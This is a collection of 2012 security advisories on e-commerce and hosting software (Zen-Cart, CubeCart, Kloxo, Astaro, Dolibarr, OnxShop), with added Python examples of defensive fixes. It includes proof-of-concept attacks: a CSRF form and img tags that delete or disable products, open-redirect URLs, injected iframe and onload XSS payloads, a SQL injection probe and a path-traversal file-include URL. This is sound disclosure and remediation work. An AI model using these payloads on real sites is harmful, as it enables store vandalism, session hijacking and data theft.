upsploit advisories | 10 Feb 17:10

Zen-Cart Admin CSRF/XSRF - Delete / Disable Products | UPS-2011-0018 | CVE-2011-4403

*Advisory Information*

Title: Zen-Cart Admin CSRF/XSRF - Delete / Disable Products
Date published: 2012-02-10 01:59:45 AM
upSploit Ref: UPS-2011-0018

CVE REF: CVE-2011-4403

*Advisory Summary*

An attacker can force an administrator to delete or disable products from within his store.

*Vendor*

Zen-Cart

*Affected Software*

Zen-Cart v1.3.9h

Zen Cart™ truly is the art of e-commerce; free, user-friendly, open source shopping cart software. The ecommerce web site design program is being developed by a group of like-minded shop owners, programmers, designers, and consultants that think ecommerce web design could be and should be done differently.

*Description of Issue*

This is a POC for CSRF on Zen-cart 1.3.9h admin control panel. By submitting this form from any location an attacker can cause the administrator to delete / disable products from his store.

*PoC*

Requirements

1. Admin user (target) must have a valid session id. Even if they have closed the admin window, this attack is still successful
2. The attacker must obtain the admin url
      * Social Engineer an admin user (trick them)
      * Packet Capture
      * Email headers
      * Invoice print out
      * I know these have been addressed in your security forum topics, but most users are not aware of these issues
3. The attacker must obtain the product id
      * This is public information
4. The attacker must then social engineer (trick them) into loading the page
      * Email with images
      * Post a forum topic with the images
      * Link them to a page on the attacker’s server

Proof of Concept

Delete:

This form can be hidden and made to submit automatically on page load:

<form name="products" action="http://www.mysite.com/path_to_admin/product.php?action=delete_product_confirm" method="post">
<label for="securityToken">Security Token</label><br/><input type="text" name="securityToken" value="Can be anything…" /><br/><br/>
<label for="products_id">Products ID</label><br/><input type="text" name="products_id" value="329"><br/><br/>
<label for="product_categories[]">Products Category</label><br/><input type="text" value="48" name="product_categories[]"><br/><br/>
<input type="submit" border="0" alt="Delete" value=" Delete Product">
</form>

Disable:

<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=1"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=2"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=3"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=4"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=5"/>

Proposed Solution

* Add the security token conditional statement to the delete_product_confirm.php for all product types
* This should be applied to all requests made within the admin control panel rather than just key operations

*Credits*

DisK0nn3cT

*References*

http://www.zen-cart.com/
http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)

*Patch/Fix*

Update to the latest version

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
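The advisory's proposed fix is to check the security token on every admin request, not only on key operations. The example below is added here and is not Zen-Cart code: it shows that check in Python, refusing the PoC's forged POST (arbitrary securityToken) and the GET-based setflag request, while a POST carrying the session's own token passes; the session object and request shapes are constructed.

```python
import hmac
import secrets


class AdminSession:
    """Constructed stand-in for the server-side session of a logged-in admin.

    The token is generated server-side and only embedded in pages served to
    that admin, so a page on the attacker's site cannot read it (same-origin
    policy) and cannot put the right value into its form.
    """

    def __init__(self):
        self.security_token = secrets.token_hex(16)


def is_authorized_state_change(session, method, params):
    """Decide whether a state-changing admin request may proceed.

    - Only POST is accepted: a GET such as categories.php?action=setflag
      triggered from an <img> tag is refused before any token check.
    - securityToken must be present and equal to the session's token; the
      advisory's form sends an arbitrary string and is therefore rejected.
    - The comparison is constant-time so the token cannot be guessed
      byte-by-byte via timing.
    """
    if method.upper() != "POST":
        return False
    supplied = params.get("securityToken")
    if not isinstance(supplied, str) or not supplied:
        return False
    return hmac.compare_digest(supplied, session.security_token)


def demo():
    """Replay the two PoC request shapes plus one genuine admin request."""
    session = AdminSession()
    forged_delete = {"securityToken": "Can be anything...",
                     "products_id": "329", "product_categories[]": "48"}
    forged_disable = {"action": "setflag", "flag": "0", "pID": "1"}
    genuine_delete = {"securityToken": session.security_token,
                      "products_id": "329"}
    return {
        "forged_delete": is_authorized_state_change(session, "POST", forged_delete),
        "forged_disable": is_authorized_state_change(session, "GET", forged_disable),
        "genuine_delete": is_authorized_state_change(session, "POST", genuine_delete),
    }


if __name__ == "__main__":
    print(demo())
```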

CubeCart 3.0.20 (3.0.x) and lower | Open URL Redirection Vulnerability

1. OVERVIEW

CubeCart 3.0.20 and lower versions are vulnerable to Open URL Redirection.

2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.

3. VULNERABILITY DESCRIPTION

The CubeCart 3.0.20 and lower versions contain a flaw that allows a
remote cross site redirection attack. This flaw exists because the
application does not properly sanitise the parameters "goto" and "r".
This allows an attacker to create a specially crafted URL, that if
clicked, would redirect a victim from the intended legitimate web site
(domain.com) to an arbitrary web site (localhost) of the attacker's
choice.

4. VERSIONS AFFECTED

3.0.20 and lower (aka 3.0.x family)

5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/cube3.0.20/switch.php?r=//yehg.net/&lang=es
http://localhost/cube3.0.20/admin/login.php?goto=//yehg.net

6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.
Upgrade to CubeCart 4x/5.x.

7. VENDOR

CubeCart Development Team
http://cubecart.com/

8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle
2012-02-10: Vulnerability disclosed

10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[cubecart_3.0.20_3.0.x]_open_url_redirection
CubeCart Home Page: http://cubecart.com/
OWASP Top 10 2010 - A 10:
http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
SANS Top 25: http://cwe.mitre.org/top25/#CWE-601
CWE-601: http://cwe.mitre.org/data/definitions/601.html
#yehg [2012-02-10]

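The PoC URLs above work because a scheme-relative value (//yehg.net) passes a naive "starts with a slash" check yet sends the browser to another host. The example below is added here and is not CubeCart code: a validator for a redirect parameter such as goto or r that accepts only same-site paths; the fallback path is an assumption.

```python
from urllib.parse import urlsplit


def is_safe_redirect_target(target):
    """Return True only for a same-site relative path such as '/index.php?x=1'.

    Rejected shapes, all of which a browser would follow off-site or
    interpret unexpectedly:
      - absolute URLs ('http://yehg.net/', 'javascript:...')
      - scheme-relative URLs ('//yehg.net/'), the advisory's PoC: the
        browser keeps the current scheme and goes to the named host
      - backslash variants ('/\\yehg.net'), which some browsers treat like '//'
      - values containing CR, LF or NUL, which could split the Location header
    """
    if not isinstance(target, str) or not target:
        return False
    if any(ch in target for ch in "\r\n\0"):
        return False
    if "\\" in target:
        return False
    if not target.startswith("/") or target.startswith("//"):
        return False
    parts = urlsplit(target)
    # Defensive confirmation: a single leading '/' carries neither scheme nor host.
    return parts.scheme == "" and parts.netloc == ""


def resolve_redirect(target, fallback="/index.php"):
    """Use the requested target when it is safe, otherwise the fixed fallback."""
    return target if is_safe_redirect_target(target) else fallback


if __name__ == "__main__":
    for t in ["//yehg.net/", "//yehg.net", "http://yehg.net/", "/\\yehg.net",
              "/cube3.0.20/index.php?lang=es"]:
        print(repr(t), "->", resolve_redirect(t))
```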


Linux Kloxo LxCenter Server CP v6.1.10 - Multiple Web Vulnerabilities

Title:
======
Kloxo LxCenter Server CP v6.1.10 - Multiple Web Vulnerabilities

Date:
=====
2012-02-10

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=429

VL-ID:
=====
429

Introduction:
=============
Scriptable, distributed and object oriented Hosting Platform. Manage Clients, Resellers, Domains, Backups, Stats, Mails and Databases. Manage everything!

(Copy of the Vendor Homepage: http://www.lxcenter.org/)

Abstract:
=========
Vulnerability-Lab Team discovered multiple web vulnerabilities on Kloxo's LxCenter Server CP v6.1.10.

Report-Timeline:
================
2012-02-10:    Public or Non-Public Disclosure

Status:
========
Unpublished

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation vulnerabilities are detected on Kloxo's LxCenter Server CP v6.1.10.
The bug allows a remote attacker to implement malicious script code on the application side (persistent).
Successful exploitation of the vulnerability allows an attacker to manipulate modules/context (persistent) and can
lead to session hijacking (user/mod/admin).

Vulnerable Module(s):
                            [+] LocalHost {Command Center}
                            [+] Server > Information > Verbose Settings

Picture(s):
                            ../1.png
                            ../2.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with medium required user interaction. For
demonstration or to reproduce ...

1.1
Localhost {Command Center}

<script> global_need_list = new Array(); </script><script>
global_match_list = new Array(); </script><script>
global_desc_list = new Array(); </script><form onsubmit="return
check_for_needed_variables('command_centerlocalhost');"
method="post" enctype="multipart/form-data" action="/display.php"
id="command_centerlocalhost" name="command_centerlocalhost">
<fieldset style="background-color: rgb(255, 255, 255); border: 0px
none; padding: 10px;" width="90%"><legend style="
font-weight: normal; border: 0px none;"><font color="#303030"
style="font-weight: bold;">Command Center for localhost
</font> </legend></fieldset>   <div align="left"
style="background-color: rgb(255, 255, 255); width: 90%;"><div align="
left" style="width: 500px; border: 1px solid rgb(177, 192,
240);"><input type="hidden" value="pserver"
name="frm_o_o[0][class]"/>
 <input type="hidden" value="localhost" name="frm_o_o[0][nname]"/>
 <div align="left" style="padding: 10px; background-color: rgb(250,
248, 248); display: block;"> Command  <br/>
... or
<input width="60%" type="text" value="
name="frm_pserver_c_ccenter_command"
class="frm_pserver_c_ccenter_command textbox"/>
<iframe size="30" <"=" [PERSISTENT SCRIPT CODE INJECT!]' src="a">
</div> <div align=left style='padding:10 10 10 10 ;border-top
:1px solid #aaaaaa; background-color:#ffffff;display:block' > Output
<br> <textarea nowrap  id=textarea_ class=
frmtextarea rows=10 style='margin:0 0 0 50;width:85%;height:200px;'
name=" size=30  ></textarea>
<script
type="text/javascript">createTextAreaWithLines('textarea_');</script>
<style>

1.2
Server => Information => 2 x Verbose Input

<font color="#303030" style="font-weight: bold;">Information for
localhost   </font> </legend></fieldset>
<div align="left" style="background-color: rgb(255, 255, 255); width:
90%;"><div align="left" style="width: 500px; border: 1px
solid rgb(177, 192, 240);"><input type="hidden" value="pserver"
name="frm_o_o[0][class]"/>
 <input type="hidden" value="localhost"
name="frm_o_o[0][nname]"/>
 <script> global_need_list['frm_pserver_c_description'] = 'Verbose
Description (to Identify)'; </script>
<div align="left" style="padding: 10px; background-color: rgb(250,
248, 248); display: block;"> Verbose Description (to Identify)
<font color="red"><sup>*</sup></font> <br/>
<input width="60%" type="text" [PERSISTENT SCRIPT CODE INJECT!]"
<iframe=" value="
>" name="frm_pserver_c_description" class="frm_pserver_c_description
textbox"/>"  size="30"> </div> <div align="left" style="
padding: 10px; border-top: 1px solid rgb(170, 170, 170);
background-color: rgb(255, 255, 255); display: block;"> FQDN Hostname
<br/>

<input width="60%" type="text" [PERSISTENT SCRIPT CODE INJECT!]"
<iframe=" value=">" name="frm_pserver_c_realhostname" class="
frm_pserver_c_realhostname textbox"/>"  size="30"> </div> <div
align="left" style="padding: 10px; border-top: 1px solid rgb(170,
170, 170); background-color: rgb(250, 248, 248); display: block;"> Load
Threshold At Which Warning Is Sent  <br/>
<input width="60%"
type="text" size="30" value="20"
name="frm_pserver_c_load_threshold"
class="frm_pserver_c_load_threshold textbox"/> </div> <input type=
"hidden" value="update" name="frm_action"/>
 <input type="hidden" value="information" name="frm_subaction"/>

Reference(s):
                ../command-center.txt
                ../server-verbose-input.txt

Risk:
=====
The security risk of the persistent input validation vulnerabilities is
estimated as medium(+).

Credits:
========
Vulnerability Research Laboratory   -    N/A  Anonymous

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

                            Copyright © 2012|Vulnerability-Lab

--

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin <at> vulnerability-lab.com or support <at> vulnerability-lab.com


upsploit advisories | 10 Feb 12:00

Astaro Security Gateway - bypass using whitelist domain pattern weakness

*Advisory Information* 

Title: Astaro Security Gateway - bypass using whitelist domain pattern weakness

upSploit Ref: UPS-2011-0041



*Advisory Summary*

Astaro Security Gateway's default Web Filtering Exceptions allow specially-named domains to bypass security features of the firewall.

*Vendor*

Astaro


*Affected Software*

Astaro Security Gateway

"Astaro Security Gateway hardware, software, and virtual appliances provide full Unified Threat Management protection. All platforms include the complete feature set and the same ease-of-use." - http://www.astaro.com/


*Description of Issue*

Astaro Security Gateway - Home edition was used; other versions may be affected.

In the ASG WebAdmin console, choose Web Security, Web Filtering, Exceptions. The following regular expressions form a default whitelist that allow bypassing of the firewall's features at varying levels to achieve compatibility (one would assume):

^https?://[A-Za-z0-9.-]*adobe.com/
^https?://[A-Za-z0-9.-]*apple.com/
^https?://[A-Za-z0-9.-]*windowsupdate.com/
^https?://[A-Za-z0-9.-]*microsoft.com/

However, a savvy attacker need only serve malware from a drive-by web site named www.exampleadobe.com (which would match the first regular expression above) and the features of the firewall that would be bypassed include: Antivirus / Extension blocking / Content Removal / Authentication / URL Filter.

The regular expressions need to be fixed to ensure the domain cannot be prefixed with other letters.


*PoC*

Use of a domain name such as www.exampleadobe.com to serve up EICAR virus (untested).

*Fix*

Update to the latest version


*Credits*

Timeless Prototype


*References*

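The weakness above is the unanchored prefix `[A-Za-z0-9.-]*` (and the unescaped dots) in the default exception patterns. The example below is added here and is not Astaro code: it runs the four default patterns and a corrected set against constructed URLs, showing that www.exampleadobe.com is exempted by the defaults but not by patterns that require a label boundary; the corrected patterns are my proposal, not the vendor's fix.

```python
import re

# The four default Web Filtering exceptions quoted in the advisory.
DEFAULT_EXCEPTIONS = [
    r"^https?://[A-Za-z0-9.-]*adobe.com/",
    r"^https?://[A-Za-z0-9.-]*apple.com/",
    r"^https?://[A-Za-z0-9.-]*windowsupdate.com/",
    r"^https?://[A-Za-z0-9.-]*microsoft.com/",
]

# Proposed corrections (mine, not Astaro's): any prefix must be whole DNS
# labels ending in a literal '.', so the host is the vendor domain itself or a
# subdomain of it, and the dots inside the domain are escaped so they no
# longer match any character.  Ports and userinfo are deliberately not
# accepted; they would need explicit handling.
FIXED_EXCEPTIONS = [
    r"^https?://([A-Za-z0-9-]+\.)*adobe\.com/",
    r"^https?://([A-Za-z0-9-]+\.)*apple\.com/",
    r"^https?://([A-Za-z0-9-]+\.)*windowsupdate\.com/",
    r"^https?://([A-Za-z0-9-]+\.)*microsoft\.com/",
]


def is_exempted(url, patterns):
    """True if the URL would skip filtering under the given exception list."""
    return any(re.match(p, url) for p in patterns)


def classify(urls, patterns=None):
    """Map each URL to (exempted by defaults, exempted by fixed patterns)."""
    return {u: (is_exempted(u, DEFAULT_EXCEPTIONS), is_exempted(u, FIXED_EXCEPTIONS))
            for u in urls}


# Constructed sample URLs: legitimate vendor hosts and look-alike hosts.
SAMPLES = [
    "https://www.adobe.com/",
    "http://download.microsoft.com/update",
    "http://www.exampleadobe.com/drop.exe",   # the advisory's case
    "http://adobexcom/",                       # unescaped '.' matches 'x'
    "http://adobe.com.example.net/",           # suffix trick, rejected by both
]


if __name__ == "__main__":
    for url, (default_ok, fixed_ok) in classify(SAMPLES).items():
        print(f"{url:40} default={default_ok!s:5} fixed={fixed_ok}")
```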

Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities

Title:
======
Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities

Date:
=====
2012-02-06

VL-ID:
=====
418

Abstract:
=========
Alexander Fuchs discovered 2 remote SQL Injection Vulnerabilities on the official website of
Indianapolis Superbowl 2012 (US).

Status:
========
Verified by Laboratory

Severity:
=========
High

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

    						Copyright © 2012|Vulnerability-Lab

--

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin <at> vulnerability-lab.com or support <at> vulnerability-lab.com



Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities

Title:
======
Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities

Date:
=====
2012-02-09

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=427

VL-ID:
=====
427

Introduction:
=============
Dolibarr ERP & CRM is a modern software to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, ...). It's an opensource free software designed for small and medium companies, foundations and freelances. You can install, use and distribute it as a standalone application or as a web application (on mutualized or dedicated server, or on SaaS or Cloud solutions) and use it with any devices (desktop, smartphone, tablet).

(Copy of the Vendor Homepage: http://www.dolibarr.org/)

Abstract:
=========
Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on Dolibarr's CMS v3.2.0 Alpha.

Report-Timeline:
================
2011-02-09:	Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Multiple remote SQL Injection vulnerabilities are detected on Dolibarr's Content Management System v3.2.0 Alpha.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own SQL commands
on the affected application DBMS. Successful exploitation of the vulnerability results in DBMS & application compromise.

Vulnerable Module(s):
					[+] Member List
					[+] Row ID

--- Error/Exception Logs ---
Das System hat einen technischen Fehler festgestellt.
Diese Informationen könnten bei der Diagnose des Fehlers behilflich sein:
Datum: 20120209164847
Dolibarr: 3.2.0-alpha
Funktions-Level: 0
PHP: 5.2.4-2ubuntu5.19
Server: Apache

Angeforderte URL: /adherents/fiche.php?rowid=-1%27
Menüverwaltung: eldy_backoffice.php

Datenbanktyp-Verwaltung: mysql
Anfrage des letzten Datenbankzugriffs mit Fehler: SELECT d.rowid, d.civilite, d.prenom as firstname, d.nom as lastname, d.societe, d.fk_soc, d.statut, d.public, d.adresse as address, d.cp as zip, d.ville as town, d.note, d.email, d.phone, d.phone_perso, d.phone_mobile, d.login, d.pass, d.photo, d.fk_adherent_type, d.morphy, d.datec as datec, d.tms as datem, d.datefin as datefin, d.naiss as datenaiss, d.datevalid as datev, d.pays, d.fk_departement, p.rowid as country_id, p.code as country_code, p.libelle as country, dep.nom as state, dep.code_departement as state_code, t.libelle as type, t.cotisation as cotisation, u.rowid as user_id, u.login as user_login FROM llx_adherent_type as t, llx_adherent as d LEFT JOIN llx_c_pays as p ON d.pays = p.rowid LEFT JOIN llx_c_departements as dep ON d.fk_departement = dep.rowid LEFT JOIN llx_user as u ON d.rowid = u.fk_member WHERE d.fk_adherent_type = t.rowid AND d.entity = 1 AND d.rowid=-1\'
Return-Code des letzten Datenbankzugriffs mit Fehler: DB_ERROR_SYNTAX
Inhalt des letzten Datenbankzugriffs mit Fehler: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\'\' at line 1

Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\'\' at line 1

Picture(s):
					../1.png
					../2.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For
demonstration or to reproduce ...

1.1
1. Login to the Panel
2. Open the list.php
3. Include the following example string -
 on the memberslist -%20`

1.2
http://demo.dolibarr.org/adherents/fiche.php?rowid=-1%27[SQL Injection Vulnerability!]

Risk:
=====
The security risk of the SQL injection vulnerabilities is estimated as high(+).

Credits:
========
Vulnerability Research Laboratory   -    Benjamin Kunz Mejri   & Ucha Gobejishvili

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

    						Copyright © 2012|Vulnerability-Lab

--

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin <at> vulnerability-lab.com or support <at> vulnerability-lab.com

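The error log above shows the rowid value from the URL reaching MySQL as part of the query text, which is why a single quote produces DB_ERROR_SYNTAX. The example below is added here and is not Dolibarr code: using sqlite3 as a stand-in for MySQL with a constructed llx_adherent table, it reproduces that failure mode and shows the fix, validating rowid as an integer and binding it as a query parameter.

```python
import sqlite3


def make_demo_db():
    """Constructed in-memory stand-in for the llx_adherent table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE llx_adherent (rowid INTEGER PRIMARY KEY, nom TEXT, entity INTEGER)")
    conn.executemany("INSERT INTO llx_adherent VALUES (?, ?, ?)",
                     [(1, "Alice", 1), (2, "Bob", 1), (3, "Carol", 2)])
    return conn


def fetch_member_vulnerable(conn, rowid):
    """Mirrors the failing pattern: the request value becomes part of the SQL text."""
    sql = "SELECT rowid, nom FROM llx_adherent WHERE entity = 1 AND rowid=" + str(rowid)
    return conn.execute(sql).fetchall()


def fetch_member_safe(conn, rowid):
    """Validate the type first, then bind the value as a parameter.

    A row id is an integer; anything else (such as -1') is refused before
    the database sees it, and the accepted value travels as data, not SQL.
    Returns None for a rejected value, otherwise the matching rows.
    """
    try:
        rowid_int = int(str(rowid).strip())
    except ValueError:
        return None
    sql = "SELECT rowid, nom FROM llx_adherent WHERE entity = 1 AND rowid=?"
    return conn.execute(sql, (rowid_int,)).fetchall()


def demo(rowid_param="-1'"):
    """Run the advisory's rowid value through both code paths."""
    conn = make_demo_db()
    try:
        fetch_member_vulnerable(conn, rowid_param)
        vulnerable_error = None
    except sqlite3.OperationalError as exc:
        vulnerable_error = str(exc)        # the DB_ERROR_SYNTAX equivalent
    return {
        "vulnerable_error": vulnerable_error,
        "safe_result": fetch_member_safe(conn, rowid_param),
        "safe_valid": fetch_member_safe(conn, "1"),
    }


if __name__ == "__main__":
    print(demo())
```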


OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities

Title:
======
OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities

Date:
=====
2012-02-08

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=426

VL-ID:
=====
426

Introduction:
=============
Onxshop is not only a great CMS offering integrated in-context editing and full design freedom without the constraints of limiting templates, but it's also a stable ecommerce platform used in production environments since 2006. Flexible layout modules, which support nesting based on the Fibonacci sequence. Complete HTML/CSS framework, which allows you to use the same HTML and core CSS for multiple websites with different branding and designs.

Simplified MVC paradigm using Model = Storage Access (SQL and PHP), View = Presentation to client (simple HTML engine), Controller = Handling actions (request processing in PHP to produce View). To put it simply, you will not see the $align option in Model or Controller or the SQL query in Controller. Flexible routing system which allows each component to be called on its own (useful for AJAX). The option to rewrite each template, model or controller specifically for a project, so developers can add their own stamp to the system. Common components that are all built directly by our core team, which means that 99% of projects don't need to install external components. This eliminates problems with incompatible components (extensions/modules/plugins) which affects some CMS software. Behavioural targeting support in the core system and many other components. An all in one system - content management system, blog, product catalogue and checkout process all rolled into one. This allows users to share the same category system and media library across their product catalogue and blog articles, or include an “add to basket” button in blog posts about a product. There isn't any other web system in the universe which can do this with such ease. One fulltext search for the CMS, eCommerce and blog.

Onxshop is a new kind of Content Management System (Shop|eCommerce). Onxshop is currently used by more than 50 businesses around the world, and that figure is growing all the time.

(Copy of the Vendor Homepage: http://onxshop.com/)

Abstract:
=========
Vulnerability-Lab Team discovered multiple web vulnerabilities on Onxshop's Content Management System v1.5.0.

Report-Timeline:
================
2012-02-09:	Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation vulnerabilities are detected on Onxshop's Content Management System v1.5.0.
The bug allows a remote attacker to implement malicious script code on the application side (persistent).
Successful exploitation of the vulnerability allows an attacker to manipulate modules/context (persistent) and can
lead to session hijacking (user/mod/admin).

Vulnerable Module(s):
							[+] Pages - Title
							[+] Search - Keywords & Inputs
							[+] Voucher

Pictures:
							../1.png
							../2.png
							../3.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with medium required user interaction. For
demonstration or to reproduce ...

1.
<tr id="node_id_1194">
<td><a onclick="openEdit('/popup/properties/1194/orig/page/88')" href="javascript:void(1194)
" class="">">&#8203;&#8203;&#8203;&#8203;&#8203;<iframe a="" <<=""
onload='alert("VulnerabilityLab")' src="a"></td>
<td>page/default</td>
<td>0</td>
<td>0</td>
<td><div class="onxshop_page_properties"><a class="onxshop_delete"
title="Delete default" href="#1194"><span>Delete</span></a></div></td></tr>
</tbody>
	</table>

2.
<div id="breadCrumb">
   <a href="/reports">Reports</a> <span style="font-size:8px;">></span><span class="location">
   "><img src="http://www.vulnerability-lab.com/gfx/partners/vlab.png" onLoad=alert(1337);></span>	[X]
</div>

...or

<option value="all">All Orders</option></select>
</span>
</div><div class="row search">

<span class="label"><label>Search query</label></span>
<span class="field">
&#8203;&#8203;&#8203;&#8203;&#8203;<input width="800" type="text" height="800"
src="http://vulnerability-lab.com" <iframe="" 
value=">" name="order-list-filter[query]" id="query"/>" /></span></div>

<div class="row registered_between">
<span class="label"><label>Created between</label></span>

<span class="field">
<input width="800" type="text" height="800" src="http://vulnerability-lab.com" 
<iframe="" value=">" name="order-list-filter[created_from]"
id="order-list-filter-created_from" 
class="text hasDatepicker"/>" />
<input width="800" type="text" height="800" 
src="http://vulnerability-lab.com" <iframe="" value=">" name="order-list-filter[created_to]" id="order-list-
filter-created_to" class="text hasDatepicker"/>" /></span>&#8203;&#8203;&#8203;&#8203;&#8203;
	

3.
<tr class="disabled">
<td><a href="#promotionEdit" onclick="makeAjaxRequest('#promotionEdit', 
'/request/bo/component/ecommerce/promotion_edit~id=2~');" title="Edit promotion settings">>"&#8203;&#8203;&#8203;&#8203;&#8203;
<iframe width="800" height="800" src="http://vulnerability-lab.com"></a></td>
<td>>"<iframe src=http://vulnerability-lab.com width=800 height=800></td>

<td class="number">0</td>
<td class="money">£0.00</td>
<td class="money">£0.00</td>
</tr>

Reference(s):
				../pages.txt
				../search.txt
				../vouchers-name.txt

Risk:
=====
The security risk of the persistent input validation vulnerabilities is estimated as medium.

Credits:
========
Vulnerability Research Laboratory   -    N/A  Anonymous

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab
disclaims all warranties, either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of
damage, including direct, indirect, incidental, consequential loss of business profits or special damages,
even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so
the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of
this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this
alert in its unmodified form is granted. All other rights, including the use of other media, are reserved
by Vulnerability-Lab or its suppliers.

    						Copyright © 2012|Vulnerability-Lab

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin <at> vulnerability-lab.com or support <at> vulnerability-lab.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Dolibarr CMS v3.2.0 Alpha - File Include Vulnerabilities

Title:
======
Dolibarr CMS v3.2.0 Alpha - File Include Vulnerabilities

Date:
=====
2012-02-07

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=428

VL-ID:
=====
428

Introduction:
=============
Dolibarr ERP & CRM is a modern software to manage your company or foundation activity (contacts, suppliers,
invoices, orders, stocks, agenda, ...). It's open-source free software designed for small and medium
companies, foundations and freelancers. You can install, use and distribute it as a standalone application
or as a web application (on mutualized or dedicated server, or on SaaS or Cloud solutions) and use it with
any device (desktop, smartphone, tablet).

(Copy of the Vendor Homepage: http://www.dolibarr.org/)

Abstract:
=========
A Vulnerability-Lab researcher discovered multiple File Include Vulnerabilities in Dolibarr's CMS
v3.2.0 Alpha.

Report-Timeline:
================
2011-02-08:	Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
Multiple File Include Vulnerabilities are detected in Dolibarr's Content Management System v3.2.0 Alpha.
The vulnerability allows a remote attacker or a local low-privileged user account to request local
web-server or system files. Successful exploitation of the vulnerability results in dbms & application compromise.

Vulnerable Module(s):
					[+] ?modulepart=project&file=
					[+] ?action=create&actioncode=AC_RDV&contactid=1&socid=1&backtopage=

Picture(s):
					../1.png
					../2.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local low-privileged user accounts. For
demonstration or to reproduce ...

http://xxx.com/document.php?modulepart=project&file=../[FILE INCLUDE VULNERABILITY!]

